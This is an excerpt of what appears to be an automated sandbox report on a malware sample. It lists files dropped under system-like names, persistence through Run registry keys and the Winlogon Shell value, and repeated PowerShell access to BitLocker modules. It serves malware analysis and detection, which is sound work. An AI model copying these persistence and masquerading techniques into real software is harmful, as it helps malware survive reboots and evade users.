                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\apppatch\CustomSDB\sihost.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\BitLockerDiscoveryVolumeContents\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\phhpjhAr.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\ANcNpKUT.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\qeIxFhOl.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\hwphVFJE.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\otdhyUEt.logJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeFile created: C:\Users\user\Desktop\dFyrOIJL.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\GEAmOcnc.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\pGGHecbL.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\fXnruzVd.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\WteBKGGw.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\utYFHYqz.logJump to dropped file
                                Source: C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exeFile created: C:\Users\user\Desktop\TDoLDJFD.logJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\drivEn760.exeFile created: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\License.txtJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeFile created: C:\Program Files\Everything\License.txtJump to behavior

                                Boot Survival

                                barindex
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                                Source: C:\Program Files\Everything\Everything.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EverythingJump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerwebruntime
                                Source: C:\Program Files\Everything\Everything.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Everything.lnkJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\nss476A.tmp\Everything\Everything.exeCode function: 6_2_00007FF63D475670 StartServiceCtrlDispatcherW,6_2_00007FF63D475670
                                Source: C:\Program Files\Everything\Everything.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EverythingJump to behavior
                                Source: C:\Program Files\Everything\Everything.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EverythingJump to behavior
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerwebruntime
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run containerwebruntime
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy
                                Source: C:\Users\user\AppData\Roaming\surrogateDriverintoSessionNet\containerwebruntime.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KocFkUIHAfhPoyuBQDEUMiWWSPCixy

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
